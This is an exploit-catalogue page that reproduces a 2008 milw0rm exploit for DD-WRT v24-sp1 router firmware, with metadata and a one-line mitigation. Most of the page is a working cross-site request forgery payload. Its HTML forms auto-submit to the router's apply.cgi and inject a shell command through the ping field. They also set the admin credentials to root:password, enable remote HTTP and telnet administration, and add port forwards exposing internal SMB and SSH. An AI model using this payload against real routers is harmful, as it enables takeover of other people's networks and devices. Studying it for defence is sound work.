header-logo
Suggest Exploit
vendor:
DD-WRT v24-sp1 (07/27/08) micro
by:
Michael Brooks
7.5
CVSS
HIGH
Remote root command execution
78
CWE
Product Name: DD-WRT v24-sp1 (07/27/08) micro
Affected Version From: DD-WRT v24-sp1 (07/27/08) micro
Affected Version To: DD-WRT v24-sp1 (07/27/08) micro
Patch Exists: YES
Related CWE: N/A
CPE: h:dd-wrt:dd-wrt_v24-sp1_07/27/08_micro
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

Remote root dd-wrt

This exploit allows for remote root command execution, changing of the web administration password and enabling of remote administration, and creating of new port forwarding rules to bypass NAT.

Mitigation:

Ensure that the DD-WRT router is running the latest version of the firmware and that all security patches are up to date.
Source

Exploit-DB raw data:

Remote root dd-wrt
--------------------------------------------------------------------------------

Written by Michael Brooks
Special thanks to str0ke

Exploits tested on the newist stable version:
Firmware: DD-WRT v24-sp1 (07/27/08) micro
Product Homepage:
http://dd-wrt.com/

Impact:
1)Remote root command execuiton /bin/sh
2)Change web administration password and enable remote admistration
3)create new Port Forwarding rules to byass NAT.

<html>
	<head>
		<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
	</head>
	Remote root command execution /bin/sh
	<form method="post" action="http://192.168.1.1/apply.cgi" id=1>
		<input name="submit_button" value="Ping" type="hidden">
		<input name="action" value="ApplyTake" type="hidden">
		<input name="submit_type" value="start" type="hidden">
		<input name="change_action" value="gozila_cgi" type="hidden">
		<input name="next_page" value="Diagnostics.asp" type="hidden">
		<input name="ping_ip" value="echo owned">
		<input name="execute command" type="submit">
	</form><br><br>	
	enable remote administration and change login to root:password
	<form method="post" action="http://192.168.1.1/apply.cgi">
		<input name="submit_button" value="Management" type="hidden">
		<input name="action" value="ApplyTake" type="hidden">
		<input name="change_action" value="" type="hidden">
		<input name="submit_type" value="" type="hidden">
		<input name="commit" value="1" type="hidden">
		<input name="PasswdModify" value="0" type="hidden">
		<input name="remote_mgt_https" value="" type="hidden">
		<input name="http_enable" value="1" type="hidden">
		<input name="info_passwd" value="0" type="hidden">
		<input name="https_enable" value="" type="hidden">
		<input name="http_username" value="root" type="hidden">
		<input name="http_passwd" value="password" type="hidden">
		<input name="http_passwdConfirm" value="password" type="hidden">
		<input name="_http_enable" value="1" type="hidden">
		<input name="refresh_time" value="3" type="hidden">
		<input name="status_auth" value="1" type="hidden">
		<input name="maskmac" value="1" type="hidden">
		<input name="remote_management" value="1" type="hidden">
		<input name="http_wanport" value="8080" type="hidden">
		<input name="remote_mgt_telnet" value="1" type="hidden">
		<input name="telnet_wanport" value="23" type="hidden">
		<input name="boot_wait" value="on" type="hidden">
		<input name="cron_enable" value="1" type="hidden">
		<input name="cron_jobs" value="" type="hidden">
		<input name="loopback_enable" value="1" type="hidden">
		<input name="nas_enable" value="1" type="hidden">
		<input name="resetbutton_enable" value="1" type="hidden">
		<input name="zebra_enable" value="1" type="hidden">
		<input name="ip_conntrack_max" value="512" type="hidden">
		<input name="ip_conntrack_tcp_timeouts" value="3600" type="hidden">
		<input name="ip_conntrack_udp_timeouts" value="120" type="hidden">
		<input name="overclocking" value="200" type="hidden">
		<input name="router_style" value="yellow" type="hidden">
		<input name="Remote Admin" type="submit">
	</form><br><br>
	Change Port Forwarding to byass NAT protection.
	<form method="post" action="http://192.168.1.1/apply.cgi">	
		<input name="submit_button" value="Change Port Forwarding" type="submit">
		<input name="action" value="ApplyTake" type="hidden">
		<input name="change_action" value="" type="hidden">
		<input name="submit_type" value="" type="hidden">
		<input name="forward_spec" value="13" type="hidden">
		<input name="name0" value="Hacked" type="hidden">
		<input name="from0" value="4450" type="hidden">
		<input name="pro0" value="both" type="hidden">
		<input name="ip0" value="192.168.1.100" type="hidden">
		<input name="to0" value="445" type="hidden">
		<input name="enable0" value="on" type="hidden">
		<input name="name1" value="Hacked Again" type="hidden">
		<input name="from1" value="22" type="hidden">
		<input name="pro1" value="tcp" type="hidden">
		<input name="ip1" value="192.168.1.101" type="hidden">
		<input name="to1" value="22" type="hidden">
		<input name="enable1" value="on" type="hidden">
	</form>
</html>
<script>
	document.getElementById(1).submit();//remote root command execution!
</script>

# milw0rm.com [2008-12-08]

Navigation

Suggest Exploit

Services By CQR